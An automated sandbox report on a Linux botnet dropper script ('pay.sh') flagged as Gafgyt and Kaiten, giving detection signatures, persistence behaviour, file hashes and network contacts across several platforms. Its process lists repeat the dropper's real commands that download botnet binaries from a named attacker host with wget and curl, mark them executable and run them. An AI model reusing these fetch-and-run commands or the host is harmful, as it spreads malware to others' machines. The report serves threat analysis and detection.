Malware Analysis Report

2024-11-13 17:22

Sample ID 241022-tj267svgrq
Target pay.sh
SHA256 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
Tags
gafgyt kaiten botnet defense_evasion discovery persistence privilege_escalation antivm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

Threat Level: Known bad

The file pay.sh was found to be: Known bad.

Malicious Activity Summary

gafgyt kaiten botnet defense_evasion discovery persistence privilege_escalation antivm

Detected Gafgyt variant

Detects Kaiten/Tsunami Payload

Kaiten/Tsunami

Detects Kaiten/Tsunami payload

Gafgyt/Bashlite

Executes dropped EXE

File and Directory Permissions Modification

Creates/modifies environment variables

Modifies Bash startup script

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-22 16:06

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-22 16:06

Reported

2024-10-22 16:08

Platform

debian9-mipsbe-20240611-en

Max time kernel

64s

Max time network

69s

Command Line

[/tmp/pay.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Kaiten/Tsunami

botnet kaiten

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/m3cr0 /tmp/m3cr0 N/A
N/A /tmp/zigaarch64 /tmp/zigaarch64 N/A
N/A /tmp/x00x /tmp/x00x N/A
N/A /tmp/m3cr0 /tmp/m3cr0 N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /root/.bashrc /tmp/pay.sh N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /root/.bashrc /tmp/pay.sh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zigaarch64 /usr/bin/wget N/A
File opened for modification /tmp/zigaarch64 /usr/bin/curl N/A
File opened for modification /tmp/x00x /usr/bin/curl N/A
File opened for modification /tmp/bash.sh /usr/bin/wget N/A
File opened for modification /tmp/bash.sh /usr/bin/curl N/A
File opened for modification /tmp/m3cr0 /usr/bin/wget N/A
File opened for modification /tmp/m3cr0 /usr/bin/curl N/A
File opened for modification /tmp/x00x /usr/bin/wget N/A
File opened for modification /tmp/m3cr0 /usr/bin/curl N/A
File opened for modification /tmp/m3cr0 /usr/bin/wget N/A

Processes

/tmp/pay.sh

[/tmp/pay.sh]

/usr/bin/wget

[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]

/usr/bin/curl

[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]

/bin/chmod

[chmod +x m3cr0]

/tmp/m3cr0

[./m3cr0]

/bin/rm

[rm -rf m3cr0]

/bin/rm

[rm -rf m3cr0.1]

/usr/bin/wget

[wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64]

/usr/bin/curl

[curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64]

/bin/chmod

[chmod +x zigaarch64]

/tmp/zigaarch64

[./zigaarch64]

/bin/rm

[rm -rf zigaarch64]

/bin/rm

[rm -rf zigaarch64.1]

/usr/bin/wget

[wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x]

/usr/bin/curl

[curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x]

/bin/chmod

[chmod +x x00x]

/tmp/x00x

[./x00x]

/bin/rm

[rm -rf x00x]

/bin/rm

[rm -rf x00x.1]

/usr/bin/wget

[wget http://floodernetwork111.accesscam.org:8089/bash.sh]

/usr/bin/curl

[curl -O http://floodernetwork111.accesscam.org:8089/bash.sh]

/bin/rm

[rm -rf bash.sh.1]

/bin/bash

[bash bash.sh]

/usr/bin/wget

[wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]

/usr/bin/curl

[curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]

/bin/chmod

[chmod +x m3cr0]

/tmp/m3cr0

[./m3cr0]

/bin/rm

[rm -rf m3cr0]

/bin/rm

[rm -rf m3cr0.1]

/bin/sleep

[sleep 6000]

Network

Country Destination Domain Proto
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp

Files

/tmp/m3cr0

MD5 75c00b238bd8105414cbb5d08601ca1a
SHA1 2a5e59555f348bfd9fa9fc4e3e04338ee4e74576
SHA256 edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361
SHA512 a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5

/tmp/zigaarch64

MD5 48ea3c3566c796e4f74e8e3d6df15cd3
SHA1 b1ef1574ced09471c26a4c749d5a4ab5ba7942cd
SHA256 79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a
SHA512 cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd

/tmp/x00x

MD5 f042a9131a6d06671e98c1ed1f8d80a8
SHA1 dd97fac87e8d4a973dc4867524908f3384916f27
SHA256 a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c
SHA512 629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe

/tmp/bash.sh

MD5 8bbe815474c7d3ed318e958c05e1c95b
SHA1 36235a707a29d27b01570ef8c973c522f563c15c
SHA256 469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b
SHA512 137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-22 16:06

Reported

2024-10-22 16:08

Platform

debian9-mipsel-20240729-en

Max time kernel

41s

Max time network

43s

Command Line

[/tmp/pay.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Kaiten/Tsunami

botnet kaiten

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/m3cr0 /tmp/m3cr0 N/A
N/A /tmp/zigaarch64 /tmp/zigaarch64 N/A
N/A /tmp/x00x /tmp/x00x N/A
N/A /tmp/m3cr0 /tmp/m3cr0 N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /root/.bashrc /tmp/pay.sh N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /root/.bashrc /tmp/pay.sh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zigaarch64 /usr/bin/wget N/A
File opened for modification /tmp/zigaarch64 /usr/bin/curl N/A
File opened for modification /tmp/x00x /usr/bin/curl N/A
File opened for modification /tmp/bash.sh /usr/bin/curl N/A
File opened for modification /tmp/m3cr0 /usr/bin/wget N/A
File opened for modification /tmp/m3cr0 /usr/bin/curl N/A
File opened for modification /tmp/m3cr0 /usr/bin/wget N/A
File opened for modification /tmp/m3cr0 /usr/bin/curl N/A
File opened for modification /tmp/x00x /usr/bin/wget N/A
File opened for modification /tmp/bash.sh /usr/bin/wget N/A

Processes

/tmp/pay.sh

[/tmp/pay.sh]

/usr/bin/wget

[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]

/usr/bin/curl

[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]

/bin/chmod

[chmod +x m3cr0]

/tmp/m3cr0

[./m3cr0]

/bin/rm

[rm -rf m3cr0]

/bin/rm

[rm -rf m3cr0.1]

/usr/bin/wget

[wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64]

/usr/bin/curl

[curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64]

/bin/chmod

[chmod +x zigaarch64]

/tmp/zigaarch64

[./zigaarch64]

/bin/rm

[rm -rf zigaarch64]

/bin/rm

[rm -rf zigaarch64.1]

/usr/bin/wget

[wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x]

/usr/bin/curl

[curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x]

/bin/chmod

[chmod +x x00x]

/tmp/x00x

[./x00x]

/bin/rm

[rm -rf x00x]

/bin/rm

[rm -rf x00x.1]

/usr/bin/wget

[wget http://floodernetwork111.accesscam.org:8089/bash.sh]

/usr/bin/curl

[curl -O http://floodernetwork111.accesscam.org:8089/bash.sh]

/bin/rm

[rm -rf bash.sh.1]

/bin/bash

[bash bash.sh]

/usr/bin/wget

[wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]

/usr/bin/curl

[curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]

/bin/chmod

[chmod +x m3cr0]

/tmp/m3cr0

[./m3cr0]

/bin/rm

[rm -rf m3cr0]

/bin/rm

[rm -rf m3cr0.1]

/bin/sleep

[sleep 6000]

Network

Country Destination Domain Proto
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
BR 191.19.234.178:8089 floodernetwork111.accesscam.org tcp

Files

/tmp/m3cr0

MD5 75c00b238bd8105414cbb5d08601ca1a
SHA1 2a5e59555f348bfd9fa9fc4e3e04338ee4e74576
SHA256 edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361
SHA512 a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5

/tmp/zigaarch64

MD5 48ea3c3566c796e4f74e8e3d6df15cd3
SHA1 b1ef1574ced09471c26a4c749d5a4ab5ba7942cd
SHA256 79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a
SHA512 cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd

/tmp/x00x

MD5 f042a9131a6d06671e98c1ed1f8d80a8
SHA1 dd97fac87e8d4a973dc4867524908f3384916f27
SHA256 a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c
SHA512 629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe

/tmp/bash.sh

MD5 8bbe815474c7d3ed318e958c05e1c95b
SHA1 36235a707a29d27b01570ef8c973c522f563c15c
SHA256 469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b
SHA512 137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-22 16:06

Reported

2024-10-22 16:08

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/pay.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/m3cr0 /usr/bin/wget N/A

Processes

/tmp/pay.sh

[/tmp/pay.sh]

/usr/bin/wget

[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]

/usr/bin/curl

[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
US 151.101.129.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
GB 84.17.50.8:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.9:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-22 16:06

Reported

2024-10-22 16:09

Platform

debian9-armhf-20240611-en

Max time kernel

148s

Max time network

27s

Command Line

[/tmp/pay.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/m3cr0 /usr/bin/wget N/A

Processes

/tmp/pay.sh

[/tmp/pay.sh]

/usr/bin/wget

[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]

/usr/bin/curl

[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]

Network

Country Destination Domain Proto
US 1.1.1.1:53 floodernetwork111.accesscam.org udp
US 1.1.1.1:53 floodernetwork111.accesscam.org udp

Files

N/A